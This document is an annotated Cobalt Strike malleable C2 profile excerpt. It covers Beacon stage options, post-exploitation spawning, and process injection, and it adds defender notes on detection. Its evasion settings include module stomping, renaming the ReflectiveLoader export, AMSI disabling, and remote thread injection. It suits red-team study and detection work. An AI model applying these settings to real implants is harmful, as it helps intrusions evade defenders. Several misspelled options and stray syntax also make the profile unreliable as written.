Malleable Profiles

https://github.com/threatexpress/malleable-c2/blob/master/MalleableExplained.md

Options:

# tasks_max_size: upper bound on the size of the assembly/powershell scripts
# sent to Beacon as tasks (value left blank here)
set tasks_max_size "";

Beacons:

stage {
	# Beacon image header/metadata fields. "DATE OF COMPILATION" is a placeholder
	# and both image sizes are set to the same value.
	set compile_time "DATE OF COMPILATION";
	set image_size_x64 "522090";
	set image_size_x86 "522090";
	set clearnup "true";
	set obfucate "true";
	# name the Beacon DLL presents, and the modules named for stomping (see stomppe)
	set name "dataparse.dll";
	set module_x86 "wuaueng.dll";
	set module_x64 "mssrch.dll";
	# defender note: with stomppe, the in-memory image of the module named above
	# presumably no longer matches its on-disk file — comparing loaded modules in
	# memory against their on-disk copies is the corresponding detection angle.
	set stomppe "true";
	# string replacements applied to the Beacon DLL; "ReflectiveLoader" is a widely
	# signatured export name, so detection should not rely on that string alone
	transform-x86 {
		strrep "ReflectiveLoader" "RunHelloWorld";
		}
	transform-x64 {
		strrep "ReflectiveLoader" "PrintMenu";
		}
}

Post-Ex:

##         = replaced with random numbers in a pipe name
msagent_## = pipe name used for standard communications
status_##  = pipe name used for staging over SMB
post-ex {
      # control the temporary process we spawn to
      # defender note: post-ex jobs run inside these sacrificial processes
      # (dllhost.exe / mstsc.exe), so parent/child and command-line anomalies for
      # those binaries are the telemetry to watch
      set spawnto_x86 "`%windir%\syswow64\dllhost.exe` -k netsvcs";.
      set spawnto_x64 "%windir%\\sysnative\\mstsc.exe";

      # change the permissions and content of our post-ex DLLs 
      set obfuscate "true";

      # change our post-ex output named pipe names ("##" is replaced with random
      # numbers, see the legend above; the comma-separated value lists more than one name)
      set pipename "evil_####, stuff\\not_##_ev#l";
      set pipename_stager "update_##";

      # pass key function pointers from Beacon to its child jobs 
      set smartinject "true";

      # disable AMSI in powerpick, execute-assembly, and psinject 
      # defender note: tampering with AMSI inside the spawned process is itself
      # observable and a detection opportunity independent of the payload
      set amsi_disable "true";
}

Process-Inject:

process-inject {
    # how memory is allocated in a remote process:
    set allocator "VirtualAllocEx";
    
    # shape memory characteristics and content: minimum allocation size, and
    # startrwx / userwx, which appear to control the initial and final page
    # protections of the injected region
    # defender note: allocation size and page-protection transitions are what
    # memory-scanning telemetry keys on, so these settings are detection signals
    set min_alloc "16384";
    set startrwx "true";
    set userwx "false";
    
    # prepend two NOP bytes (\x90) to the injected content on both architectures
    transform-x86 {
        prepend "\x90\x90";
    }
    transform-x64 {
        prepend "\x90\x90";
    }
    
    # determine how to execute the injected code; the techniques are presumably
    # tried in the listed order, CreateThread against ntdll!RtlUserThreadStart first
    execute {
        CreateThread "ntdll.dll!RtlUserThreadStart";
        SetThreadContext;
        RtlCreateUserThread;
    }
}
